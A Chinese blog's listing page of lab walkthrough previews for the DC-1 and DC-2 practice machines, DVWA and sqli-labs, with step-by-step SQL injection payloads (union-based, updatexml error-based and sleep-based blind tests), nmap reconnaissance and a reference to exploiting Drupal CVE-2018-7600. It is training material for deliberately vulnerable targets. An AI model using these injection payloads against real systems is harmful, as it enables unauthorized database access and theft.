靶场
文章平均质量分 78
SXE
这个作者很懒,什么都没留下…
展开
-
靶场之DC-2
DC-2环境:1. 打开虚拟机2. 信息收集2.1 nmap扫描存活主机确定DC-2的ip地址2.2 利用namp扫描DC-2开放的端口2.3 访问一下80端口2.4 尝试寻找该网站的CMS3. 寻找flag3.1 寻找flag13.2 寻找flag23.3 寻找flag33.4 寻找flag4.txt3.4 寻找the final flag总结环境:靶机名称:DC-2攻击机:kali 192.168.78.1351. 打开虚拟机导入.ova文件,开启虚拟机2. 信息收集2.1 nmap原创 2021-07-27 15:29:08 · 1404 阅读 · 0 评论 -
靶场之DC-1
DC-1靶机环境:1. 打开虚拟机2. 信息收集2.1 nmap扫描存活主机确定DC-1的ip地址2.2 利用namp扫描DC-1开放的端口2.3 访问80端口2.4 寻找Drupal版本信息(多种办法)2.5 寻找此版本Drupal的漏洞2.6 使用漏扫工具OpenVas3. 漏洞利用(CVE-2018-7600)3.1 寻找flag13.2 寻找flag23.3 寻找flag33.4 寻找flag43.5 寻找flag5补充:OpenVas中的CVE-2014-3704也可以做环境:靶机名称:DC-原创 2021-07-26 16:57:53 · 803 阅读 · 1 评论 -
DVWA靶场通关之SQL Injection
SQL Injection以下ip均为dwva靶场的ip地址,这里我搭建在虚拟机win2008中一. low1. 求闭合字符输入1 1' and 1=1 #可能存在单引号sql注入2. 求列数1' and 1=1 order by 2# 1' and 1=1 order by 3# 说明有两列3. 求显示位1' and 1=2 union select 1,2 #4. 爆数据名1' and 1=2 union select 1,database()原创 2021-07-19 22:32:02 · 1203 阅读 · 2 评论 -
sqli靶场通关之less9
sqliless9时间盲注 结合burpsuite1.不返回报错信息页面,无法进行基于报错信息的盲注。2.页面不存在true和false两种不同的页面,无法进行对比也就无法进行布尔盲注。一般来说,在页面没有任何回显和错误信息提示的时候,我们就会测试时间盲注这个手法。1. 求闭合字符id=1',1),1'),1"等都试过了,发现始终没有报错信息,猜测正确的输入和错误的输入返回的结果被设置成一样的了查看源码,证实了猜测,尝试使用时间盲注id=1 and sleep(5) //未延迟i原创 2021-07-19 22:18:24 · 1289 阅读 · 1 评论 -
sqli靶场通关之less4
sqliless4方法一:updatexml报错函数1. 找闭合字符id = 1”) //异常 id = 1”) and 1 =1 -- + //正确 id = 1”) and 1 =2 -- + //错误说明可能存在双引号字符型注入2. 求列数id=1") order by 3 -- +id=1") order by 4 -- +说明有3列3. 求显示位id=1") and 1=2 union select 1,2,3 -- +4. 爆数据库名id=1"原创 2021-07-15 16:41:07 · 399 阅读 · 0 评论 -
sqli靶场通关之less2
sqli靶场less2方法一:union联合查询1. 求闭合字符id=1 //无异常id=1 and 1 =1 -- + //正确显示id=1 and 1 =2 -- + //错误说明有可能存在数字型SQL注入2. 求列数id=1 order by 3 -- + id=1 order by 4 -- + 说明有3列3. 求显示位id=-1 union select 1,2,3 -- +4. 爆数据库名id=1 and 1=2 union select 1,原创 2021-07-15 16:29:20 · 483 阅读 · 1 评论